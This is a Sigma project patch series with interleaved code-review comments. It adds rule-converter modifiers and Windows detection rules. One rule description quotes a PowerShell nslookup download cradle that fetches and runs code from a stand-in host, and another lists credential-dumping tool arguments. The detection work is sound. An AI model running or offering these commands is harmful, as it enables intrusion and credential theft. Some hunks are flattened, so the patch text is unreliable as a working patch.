From 184b6bb2442e3e2ab708f6b6e9c6051e447f1ad9 Mon Sep 17 00:00:00 2001
From: Thomas Patzke
Date: Sun, 1 May 2022 23:07:25 +0200
Subject: [PATCH 01/73] Wrapping base64offset modified expansion group into ConditionOR
---
 tests/test-base64offset-all.yml | 10 ++++++++
 tools/sigma/backends/base.py | 3 +++
 tools/sigma/parser/modifiers/transform.py | 28 ++++++++++++++---------
 tools/sigma/sigmac.py | 28 +++++++++++------------
 4 files changed, 44 insertions(+), 25 deletions(-)
 create mode 100644 tests/test-base64offset-all.yml
diff --git a/tests/test-base64offset-all.yml b/tests/test-base64offset-all.yml
new file mode 100644
index 000000000..9d23c8f65
--- /dev/null
+++ b/tests/test-base64offset-all.yml
@@ -0,0 +1,10 @@
+title: Testrule
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|base64offset|contains|all:
+ - foo
+ - bar
+ condition: selection
\ No newline at end of file
diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py
index c12face60..b22f5dadf 100644
--- a/tools/sigma/backends/base.py
+++ b/tools/sigma/backends/base.py
@@ -21,6 +21,7 @@ import yaml
 import re
 from sigma.backends.exceptions import NotSupportedError
+from sigma.parser.condition import ConditionOR
 from .mixins import RulenameCommentMixin, QuoteCharMixin
 from sigma.parser.modifiers.base import SigmaTypeModifier
@@ -328,6 +329,8 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin):
 return self.generateMapItemTypedNode(transformed_fieldname, value)
 elif value is None:
 return self.nullExpression % (transformed_fieldname, )
+ elif isinstance(value, ConditionOR):
+ return self.generateORNode(value)
 else:
 raise TypeError("Backend does not support map values of type " + str(type(value)))
diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py
index 8af354176..b0399e6bb 100644
--- a/tools/sigma/parser/modifiers/transform.py
+++ b/tools/sigma/parser/modifiers/transform.py
@@ -16,7 +16,7 @@
 from .base import SigmaTransformModifier
 from .mixins import ListOrStringModifierMixin
-from sigma.parser.condition import ConditionAND
+from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR
 from base64 import b64encode
 class SigmaContainsModifier(ListOrStringModifierMixin, SigmaTransformModifier):
@@ -24,14 +24,17 @@ class SigmaContainsModifier(ListOrStringModifierMixin, SigmaTransformModifier):
 identifier = "contains"
 active = True
- def apply_str(self, val : str):
- if not val.startswith("*"):
- val = "*" + val
- if not val.endswith("*"):
- if val.endswith("\\"):
- val += "\\*"
- else:
- val += "*"
+ def apply_str(self, val):
+ try:
+ if not val.startswith("*"):
+ val = "*" + val
+ if not val.endswith("*"):
+ if val.endswith("\\"):
+ val += "\\*"
+ else:
+ val += "*"
+ except AttributeError:
+ pass
 return val
 class SigmaStartswithModifier(ListOrStringModifierMixin, SigmaTransformModifier):
@@ -61,7 +64,7 @@ class SigmaAllValuesModifier(SigmaTransformModifier):
 """Override default OR-linking behavior for list with AND-linking of all list values"""
 identifier = "all"
 active = True
- valid_input_types = (list, tuple, )
+ valid_input_types = (list, tuple, ConditionBase)
 def apply(self):
 vals = super().apply()
@@ -93,7 +96,7 @@ class SigmaBase64OffsetModifier(ListOrStringModifierMixin, SigmaTransformModifie
 def apply_str(self, val):
 if type(val) == str:
 val = val.encode()
- return [
+ items = [
 b64encode(
 i * b' ' + val
 )[
@@ -102,6 +105,9 @@ class SigmaBase64OffsetModifier(ListOrStringModifierMixin, SigmaTransformModifie
 ].decode()
 for i in range(3)
 ]
+ cond = ConditionOR()
+ cond.items = items
+ return cond
 class SigmaEncodingBaseModifier(ListOrStringModifierMixin, SigmaTransformModifier):
 """
diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py
index 80eccc23a..4d757ff01 100755
--- a/tools/sigma/sigmac.py
+++ b/tools/sigma/sigmac.py
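Review bot: The new `try`/`except AttributeError: pass` in `SigmaContainsModifier.apply_str` swallows every AttributeError raised inside the block, not only the one caused by a non-string `val`, so a genuine bug in the wildcard logic would pass silently and the value would be returned unchanged. A type guard expresses the intent and keeps the exception path for real errors: `if not isinstance(val, str): return val` placed before the existing wildcard handling, with the `try`/`except` removed. That also makes the non-string passthrough explicit, which a reader who notices the dropped `val : str` annotation would otherwise have to infer.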
@@ -109,14 +109,14 @@ def set_argparser(): Multiple log source specifications are AND linked. Special filter: inlastday=X rule create or modified in the last X days period - tlp=valid_tlp if rule have no tlp set to WHITE + tlp=valid_tlp if rule have no tlp set to WHITE """) argparser.add_argument("--target", "-t", choices=backends.getBackendDict().keys(), help="Output target format") argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") argparser.add_argument("--lists-files-after-date", "-L",help="List yml files which is modified/created after the date (Example of the date: 2022/02/01).") argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.") argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\')") - argparser.add_argument("--output-fields", "-of", help="""Enhance your output with additional fields from the Sigma rule (not only the converted rule itself). + argparser.add_argument("--output-fields", "-of", help="""Enhance your output with additional fields from the Sigma rule (not only the converted rule itself). Select the fields you want by providing their list delimited with commas (no space). Only work with the '--output-format' option and with 'json' or 'yaml' value. available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags. This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """) 
@@ -132,7 +132,7 @@ def set_argparser(): argparser.add_argument("--verbose", "-v", action="store_true", help="Be verbose") argparser.add_argument("--debug", "-D", action="store_true", help="Debugging output") argparser.add_argument("inputs", nargs="*", help="Sigma input files ('-' for stdin)") - + return argparser def list_backends(debug): @@ -264,7 +264,7 @@ def main(): exit(ERR_CONFIG_PARSING) if cmdargs.output_fields: - if cmdargs.output_format: + if cmdargs.output_format: output_fields_rejected = [field for field in cmdargs.output_fields.split(",") if field not in allowed_fields] # Not allowed fields if output_fields_rejected: print("These fields are not allowed (check help for allow field list) : %s" % (", ".join(output_fields_rejected)), file=sys.stderr) @@ -277,7 +277,7 @@ def main(): backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) backend = backend_class(sigmaconfigs, backend_options) - + filename_ext = cmdargs.output_extention filename = cmdargs.output fileprefix = None @@ -289,7 +289,7 @@ def main(): filename_ext = '.' + filename_ext else: filename_ext = '.rule' - + if filename[-1:] in ['_','/','\\']: fileprefix = filename else: @@ -321,7 +321,7 @@ def main(): nb_result = len(list(copy.deepcopy(results))) inc_filenane = None if nb_result < 2 else 0 - + newline_separator = '\0' if cmdargs.print0 else '\n' results = list(results) # Since results is an iterator and used twice we convert it a list @@ -338,7 +338,7 @@ def main(): elif not fileprefix == None and inc_filenane == None: # a simple yml try: filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml',filename_ext) + filename = filename.replace('.yml',filename_ext) out = open(filename, "w", encoding='utf-8') except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) 
@@ -368,7 +368,7 @@ def main(): fileprefix = None # no need to open the same file many time except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) + exit(ERR_OUTPUT) except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) @@ -405,7 +405,7 @@ def main(): error = ERR_BACKEND if not cmdargs.defer_abort: sys.exit(error) - except (NotImplementedError, TypeError) as e: + #except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) # traceback.print_exc() logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) @@ -429,16 +429,16 @@ def main(): if not cmdargs.ignore_backend_errors: error = ERR_FULL_FIELD_MATCH if not cmdargs.defer_abort: - sys.exit(error) + sys.exit(error) finally: try: f.close() except: pass - + if success : - logger.debug("* Convertion Sigma input %s SUCCESS" % (sigmafile)) - + logger.debug("* Convertion Sigma input %s SUCCESS" % (sigmafile)) + result = backend.finalize() if result: print(result, file=out) From 58dea50656acad5a515f97134f17601f760727ca Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Sun, 1 May 2022 23:17:33 +0200 Subject: [PATCH 02/73] Fix: Subexpression with OR instead of OR --- tools/sigma/backends/base.py | 6 +++--- tools/sigma/parser/modifiers/transform.py | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index b22f5dadf..62351e838 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py 
@@ -21,7 +21,7 @@ import yaml
 import re
 from sigma.backends.exceptions import NotSupportedError
-from sigma.parser.condition import ConditionOR
+from sigma.parser.condition import ConditionOR, NodeSubexpression
 from .mixins import RulenameCommentMixin, QuoteCharMixin
 from sigma.parser.modifiers.base import SigmaTypeModifier
@@ -329,8 +329,8 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin):
 return self.generateMapItemTypedNode(transformed_fieldname, value)
 elif value is None:
 return self.nullExpression % (transformed_fieldname, )
- elif isinstance(value, ConditionOR):
- return self.generateORNode(value)
+ elif isinstance(value, NodeSubexpression):
+ return self.generateSubexpressionNode(value)
 else:
 raise TypeError("Backend does not support map values of type " + str(type(value)))
diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py
index b0399e6bb..2b08b17df 100644
--- a/tools/sigma/parser/modifiers/transform.py
+++ b/tools/sigma/parser/modifiers/transform.py
@@ -16,7 +16,7 @@
 from .base import SigmaTransformModifier
 from .mixins import ListOrStringModifierMixin
-from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR
+from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR, NodeSubexpression
 from base64 import b64encode
 class SigmaContainsModifier(ListOrStringModifierMixin, SigmaTransformModifier):
@@ -107,7 +107,7 @@ class SigmaBase64OffsetModifier(ListOrStringModifierMixin, SigmaTransformModifie
 ]
 cond = ConditionOR()
 cond.items = items
- return cond
+ return NodeSubexpression(cond)
 class SigmaEncodingBaseModifier(ListOrStringModifierMixin, SigmaTransformModifier):
 """
From 9ee0d29d68a50622d74e3bf3331da1d2db95819a Mon Sep 17 00:00:00 2001
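Review bot: In the `SingleTextQueryBackend` map-item hunk, the new branch returns `self.generateSubexpressionNode(value)` without `transformed_fieldname`, so the field that the modifier chain was attached to does not visibly reach the generated OR group; unless `generateSubexpressionNode` re-derives the field somewhere not shown here, the base64 variants would be emitted as bare value terms rather than field-qualified ones. Worth checking against the output of `tests/test-base64offset-all.yml` on a backend that qualifies values by field; if the field is lost, the subexpression should be built from map items, e.g. by feeding each element of `value.items.items` through `generateMapItemNode([transformed_fieldname, item])` before wrapping the OR. The enclosing method starts outside the hunk.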
From: Thomas Patzke
Date: Mon, 2 May 2022 00:38:21 +0200
Subject: [PATCH 03/73] Windash modifier
---
 tests/test-windash-all.yml | 10 ++++++
 tools/sigma/parser/modifiers/transform.py | 38 +++++++++++++++++++++++
 2 files changed, 48 insertions(+)
 create mode 100644 tests/test-windash-all.yml
diff --git a/tests/test-windash-all.yml b/tests/test-windash-all.yml
new file mode 100644
index 000000000..5335a1fd5
--- /dev/null
+++ b/tests/test-windash-all.yml
@@ -0,0 +1,10 @@
+title: Testrule
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|windash|contains|all:
+ - -foo-1 -bar-2 -bla-3
+ - -foo-bar
+ condition: selection
\ No newline at end of file
diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py
index 2b08b17df..8a5267999 100644
--- a/tools/sigma/parser/modifiers/transform.py
+++ b/tools/sigma/parser/modifiers/transform.py
@@ -14,6 +14,7 @@
 # You should have received a copy of the GNU Lesser General Public License
 # along with this program. If not, see .
+import re
 from .base import SigmaTransformModifier
 from .mixins import ListOrStringModifierMixin
 from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR, NodeSubexpression
@@ -109,6 +110,43 @@ class SigmaBase64OffsetModifier(ListOrStringModifierMixin, SigmaTransformModifie
 cond.items = items
 return NodeSubexpression(cond)
+class SigmaWindashModifier(ListOrStringModifierMixin, SigmaTransformModifier):
+ """
+ Expand parameter characters / and - that are often interchangeable in Windows into the other
+ form if it appears between word boundaries. E.g. in -param-name the first dash will be expanded
+ into /param-name while the second dash is left untouched.
+ """
+ identifier = "windash"
+ active = True
+ valid_input_types = ListOrStringModifierMixin.valid_input_types
+ def expand_dashes(self, val, locations, offset=0):
+ i = locations[0]
+ if len(locations) == 1:
+ subexpansions = [ val[i + 1:]]
+ else:
+ subexpansions = self.expand_dashes(val, locations[1:], i + 1)
+ return [
+ val[offset:i] + expanded + subexpansion
+ for expanded in ("-", "/")
+ for subexpansion in subexpansions
+ ]
+ def apply_str(self, val):
+ dash_locations = [
+ m.start()
+ for m in re.finditer(re.compile("\\B[-/]\\b"), val)
+ ]
+ if dash_locations == []:
+ return val
+ else:
+ items = self.expand_dashes(val, dash_locations)
+ cond = ConditionOR()
+ cond.items = items
+ return NodeSubexpression(cond)
 class SigmaEncodingBaseModifier(ListOrStringModifierMixin, SigmaTransformModifier):
 """
 Encode string to a byte sequence with the encoding given in the encoding property. This is
From 512dad2185a13c7729c7b9aafa1680107679c953 Mon Sep 17 00:00:00 2001
From: Thomas Patzke
Date: Mon, 2 May 2022 00:43:42 +0200
Subject: [PATCH 04/73] Removed debugging code
---
 tools/sigma/sigmac.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py
index 4d757ff01..e1f19dbc4 100755
--- a/tools/sigma/sigmac.py
+++ b/tools/sigma/sigmac.py
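Review bot: `SigmaWindashModifier.expand_dashes` yields `2 ** len(locations)` strings and recurses once per location, so a value with many `-`/`/` switches (a long command line with a dozen parameters) expands into thousands of OR alternatives before any backend sees it; the class docstring should state this cost, and a bound with a clear error is preferable to unbounded growth, e.g. `if len(dash_locations) > _WINDASH_MAX_LOCATIONS: raise ValueError("windash: too many expandable positions in value")` in `apply_str`, with the constant (a placeholder name here) defined at module level. Separately, `re.finditer(re.compile("\\B[-/]\\b"), val)` compiles the pattern on every call; hoist it to a module-level `_WINDASH_RE = re.compile(r"\B[-/]\b")` and iterate `_WINDASH_RE.finditer(val)`. `if dash_locations == []:` reads more naturally as `if not dash_locations:`, and the `valid_input_types = ListOrStringModifierMixin.valid_input_types` line only restates the inherited attribute.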
@@ -405,7 +405,7 @@ def main():
 error = ERR_BACKEND
 if not cmdargs.defer_abort:
 sys.exit(error)
- #except (NotImplementedError, TypeError) as e:
+ except (NotImplementedError, TypeError) as e:
 print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr)
 # traceback.print_exc()
 logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile))
From f6ec8de5864cea811d922103374e0ff9dfdeff89 Mon Sep 17 00:00:00 2001
From: Thomas Patzke
Date: Mon, 2 May 2022 23:22:16 +0200
Subject: [PATCH 05/73] Modifier support for conditional expressions
---
 tools/sigma/parser/modifiers/mixins.py | 36 ++++++++++++++++++--------
 1 file changed, 25 insertions(+), 11 deletions(-)
diff --git a/tools/sigma/parser/modifiers/mixins.py b/tools/sigma/parser/modifiers/mixins.py
index 97f8ad87c..302d722de 100644
--- a/tools/sigma/parser/modifiers/mixins.py
+++ b/tools/sigma/parser/modifiers/mixins.py
@@ -14,6 +14,9 @@
 # You should have received a copy of the GNU Lesser General Public License
 # along with this program. If not, see .
+from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR, NodeSubexpression
+
+
 class ListOrStringModifierMixin(object):
 """
 Definitions and convenience methods for modifiers that can be applied to lists and strings.
@@ -28,21 +31,32 @@ class ListOrStringModifierMixin(object):
 valid_input_types = (list, tuple, str, )
 def apply(self):
- if type(self.value) in (list, tuple, ):
- return self.apply_list()
+ if isinstance(self.value, (list, tuple, ConditionBase, NodeSubexpression)):
+ return self.apply_list(self.value)
 else:
 return self.apply_str(self.value)
- def apply_list(self):
+ def apply_list(self, l):
 """Method is called if modifier value contains a list"""
- l = [ self.apply_str(val) for val in self.value ]
- rl = list()
- for i in l:
- if type(i) in { list, tuple, set }:
- rl.extend(i)
- else:
- rl.append(i)
- return rl
+ if isinstance(l, (list, tuple)):
+ l = [
+ self.apply_str(v)
+ if isinstance(v, str)
+ else self.apply_list(v)
+ for v in l ]
+ rl = list()
+ for i in l:
+ if type(i) in { list, tuple, set }:
+ rl.extend(i)
+ else:
+ rl.append(i)
+ return rl
+ elif isinstance(l, NodeSubexpression):
+ return NodeSubexpression(self.apply_list(l.items))
+ elif isinstance(l, ( ConditionOR, ConditionAND )):
+ cond = l.__class__()
+ cond.items = self.apply_list(l.items)
+ return cond
 def apply_str(self, val : str):
 """Method is called if modifier input value contains a string or once for each list element"""
From 26923f2d833e95161c38795a4d88fe7b81fec049 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Mon, 5 Sep 2022 18:48:40 +0200
Subject: [PATCH 06/73] Add file_event_win_susp_executable_creation
---
 ...ile_event_win_susp_executable_creation.yml | 30 +++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 rules/windows/file_event/file_event_win_susp_executable_creation.yml
diff --git a/rules/windows/file_event/file_event_win_susp_executable_creation.yml b/rules/windows/file_event/file_event_win_susp_executable_creation.yml
new file mode 100644
index 000000000..f2da7f880
--- /dev/null
+++ b/rules/windows/file_event/file_event_win_susp_executable_creation.yml
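Review bot: The rewritten `apply_list` in `ListOrStringModifierMixin` has no final `else`, so any `ConditionBase` subclass other than `ConditionOR`/`ConditionAND` (and `apply` now admits all of `ConditionBase`) falls off the end and returns `None`; the same happens for list elements that are neither `str` nor a container, because the element comprehension sends every non-`str` value, integers included, into `apply_list`, whereas the removed line passed every element through `apply_str`. If scalar non-string list values reach this path (I cannot confirm that from the hunk), they would now silently become `None`. Inverting the element test keeps the old behaviour for scalars, `self.apply_list(v) if isinstance(v, (list, tuple, ConditionBase, NodeSubexpression)) else self.apply_str(v)`, and a closing `else: raise TypeError("Unsupported modifier input type: " + str(type(l)))` turns the silent `None` into a diagnosable error. The parameter name `l` is easily misread as `1`; `value` or `items` would be clearer.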
@@ -0,0 +1,30 @@
+title: Suspicious Executable File Creation
+id: 74babdd6-a758-4549-9632-26535279e654
+status: experimental
+description: Detect creation of suspicious executable file name
+author: frack113
+references:
+ - https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/
+date: 2022/09/05
+logsource:
+ product: windows
+ category: file_event
+detection:
+ selection_double:
+ TargetFilename|endswith:
+ - '.bat.exe'
+ - '.sys.exe'
+ selection_folder:
+ TargetFilename:
+ - 'C:\$Recycle.Bin.exe'
+ - 'C:\Documents and Settings.exe'
+ - 'C:\MSOCache.exe'
+ - 'C:\Recovery.exe'
+ - 'C:\PerfLogs.exe'
+ condition: 1 of selection_*
+falsepositives:
+ - Unknown
+level: high
+tags:
+ - attack.defense_evasion
+ - attack.t1564
\ No newline at end of file
From ad6e085124365cc14198302d824d3795320f6612 Mon Sep 17 00:00:00 2001
From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com>
Date: Tue, 6 Sep 2022 08:49:45 +0900
Subject: [PATCH 07/73] rule add: nslookup pwsh download cradle
---
 ...tion_win_nslookup_pwsh_download_cradle.yml | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
new file mode 100644
index 000000000..021a598aa
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
@@ -0,0 +1,20 @@
+title: Nslookup PwSh Download Cradle
+id: 72671447-4352-4413-bb91-b85569687135
+status: experimental
+description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] '
+author: Zach Mathis (@yamatosecurity)
+date: 2022/09/06
+references:
+ - https://twitter.com/alh4zr3d/status/1566489367232651264
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ ParentImage|contains: powershell
+ CommandLine|contains: nslookup
+ CommandLine|contains: txt
+ condition: selection
+falsepositives:
+level: medium
+tags:
\ No newline at end of file
From 7c0c8996c60f720da269ea36f22e2431294d490d Mon Sep 17 00:00:00 2001
From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com>
Date: Tue, 6 Sep 2022 08:56:39 +0900
Subject: [PATCH 08/73] update
---
 ...tion_win_nslookup_pwsh_download_cradle.yml | 19 ++++++++++---------
 1 file changed, 10 insertions(+), 9 deletions(-)
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
index 021a598aa..017533392 100644
--- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
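Review bot: `selection` in this new rule repeats the key `CommandLine|contains` (`nslookup`, then `txt`); a YAML mapping cannot hold duplicate keys and PyYAML keeps the last one, so as written only `txt` is required and the `nslookup` term is dropped without any warning. Either merge them into one `CommandLine|contains|all:` list with both values or give the second term its own field; later commits in this series move the first term to `Image|contains`. `falsepositives:` and `tags:` are left with null values rather than lists, which the rule checks are likely to reject; give each an entry or drop the key.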
@@ -1,11 +1,11 @@
-title: Nslookup PwSh Download Cradle
-id: 72671447-4352-4413-bb91-b85569687135
-status: experimental
-description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] '
 author: Zach Mathis (@yamatosecurity)
 date: 2022/09/06
-references:
- - https://twitter.com/alh4zr3d/status/1566489367232651264
+
+title: Nslookup PwSh Download Cradle
+description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] '
+id: 72671447-4352-4413-bb91-b85569687135
+level: medium
+status: experimental
 logsource:
 category: process_creation
 product: windows
@@ -15,6 +15,7 @@ detection:
 CommandLine|contains: nslookup
 CommandLine|contains: txt
 condition: selection
-falsepositives:
-level: medium
-tags:
\ No newline at end of file
+references:
+ - https://twitter.com/alh4zr3d/status/1566489367232651264
+
+
From a5f5992dcbee510ab19ce4c449f7e9289b710eb9 Mon Sep 17 00:00:00 2001
From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com>
Date: Tue, 6 Sep 2022 08:59:20 +0900
Subject: [PATCH 09/73] update
---
 .../proc_creation_win_nslookup_pwsh_download_cradle.yml | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
index 017533392..cd3edf105 100644
--- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
@@ -1,6 +1,5 @@
 author: Zach Mathis (@yamatosecurity)
 date: 2022/09/06
-
 title: Nslookup PwSh Download Cradle
 description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] '
 id: 72671447-4352-4413-bb91-b85569687135
@@ -16,6 +15,4 @@ detection:
 CommandLine|contains: txt
 condition: selection
 references:
- - https://twitter.com/alh4zr3d/status/1566489367232651264
-
-
+ - https://twitter.com/alh4zr3d/status/1566489367232651264
\ No newline at end of file
From b90b4ad3a6f5e6f411760fee39e3f479e2510f2d Mon Sep 17 00:00:00 2001
From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com>
Date: Tue, 6 Sep 2022 09:03:43 +0900
Subject: [PATCH 10/73] update
---
 .../proc_creation_win_nslookup_pwsh_download_cradle.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
index cd3edf105..debbbc200 100644
--- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
@@ -11,7 +11,7 @@ logsource:
 detection:
 selection:
 ParentImage|contains: powershell
- CommandLine|contains: nslookup
+ Image|contains: nslookup
 CommandLine|contains: txt
 condition: selection
 references:
From 9abdc5ab389e0f2604fbff9c429970062b517b42 Mon Sep 17 00:00:00 2001
From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com>
Date: Tue, 6 Sep 2022 09:12:40 +0900
Subject: [PATCH 11/73] update
---
 .../proc_creation_win_nslookup_pwsh_download_cradle.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
index debbbc200..da49a404c 100644
--- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
@@ -1,6 +1,6 @@
+title: Nslookup PwSh Download Cradle
 author: Zach Mathis (@yamatosecurity)
 date: 2022/09/06
-title: Nslookup PwSh Download Cradle
 description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] '
 id: 72671447-4352-4413-bb91-b85569687135
 level: medium
From e7c53dafa17492de3c2ae45b4494339d30d9b785 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Tue, 6 Sep 2022 08:05:02 +0200
Subject: [PATCH 12/73] New rules
---
 ...eation_win_nslookup_poweshell_download.yml | 27 ++++++++++++++++
 .../proc_creation_win_quarks_pwdump.yml | 32 +++++++++++++++++++
 .../proc_creation_win_sharp_chisel_usage.yml | 32 +++++++++++++++++++
 3 files changed, 91 insertions(+)
 create mode 100644 rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
 create mode 100644 rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml
 create mode 100644 rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
new file mode 100644
index 000000000..09f23188b
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
@@ -0,0 +1,27 @@
+title: Nslookup PowerShell Download
+id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23
+status: experimental
+description: Detects usage of powershell in conjunction with nslookup as a mean of download.
+author: Nasreddine Bencherchali
+references:
+ - https://twitter.com/Alh4zr3d/status/1566489367232651264
+date: 2022/09/05
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_cli:
+ CommandLine|contains|all:
+ - 'powershell .'
+ - 'nslookup'
+ - ' -q=txt '
+ selection_img:
+ ParentImage|endswith: '\powershell.exe'
+ Image|contains: '\nslookup.exe'
+ CommandLine|contains: ' -q=txt '
+ condition: 1 of slection_*
+falsepositives:
+ - Unlikely
+level: high
+tags:
+ - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml b/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml
new file mode 100644
index 000000000..96c99cdd5
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml
@@ -0,0 +1,32 @@
+title: Quarks PwDump Usage
+id: 0685b176-c816-4837-8e7b-1216f346636b
+status: experimental
+description: Detects usage of the Quarks PwDump tool via commandline arguments
+author: Nasreddine Bencherchali
+references:
+ - https://github.com/quarkslab/quarkspwdump
+ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east
+date: 2022/09/05
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_img:
+ Image|endswith: '\QuarksPwDump.exe'
+ selection_cli:
+ CommandLine:
+ - ' -dhl'
+ - ' --dump-hash-local'
+ - ' -dhdc'
+ - ' --dump-hash-domain-cached'
+ - ' --dump-bitlocker'
+ - ' -dhd '
+ - ' --dump-hash-domain '
+ - '--ntds-file'
+ condition: 1 of selection_*
+falsepositives:
+ - Unlikely
+level: high
+tags:
+ - attack.credential_access
+ - attack.t1003.002
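Review bot: `condition: 1 of slection_*` in `proc_creation_win_nslookup_poweshell_download.yml` misspells the selection prefix, so the wildcard matches neither `selection_cli` nor `selection_img` and the rule either fails to compile or never fires; it should read `condition: 1 of selection_*`. `Image|contains: '\nslookup.exe'` in `selection_img` is also looser than the `ParentImage|endswith` beside it, and `Image|endswith: '\nslookup.exe'` is the consistent form. The file name's `poweshell` looks like a typo for `powershell` as well.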
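Review bot: `selection_cli` in `proc_creation_win_quarks_pwdump.yml` uses a plain `CommandLine:` list, which is an equality match against the whole command line, so values such as `' -dhl'` or `' --dump-hash-local'` can only match if the entire recorded command line equals that fragment, leading space included; the selection therefore never contributes and the rule collapses to the `Image|endswith` term. The intended operator is `CommandLine|contains:`.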
diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml
new file mode 100644
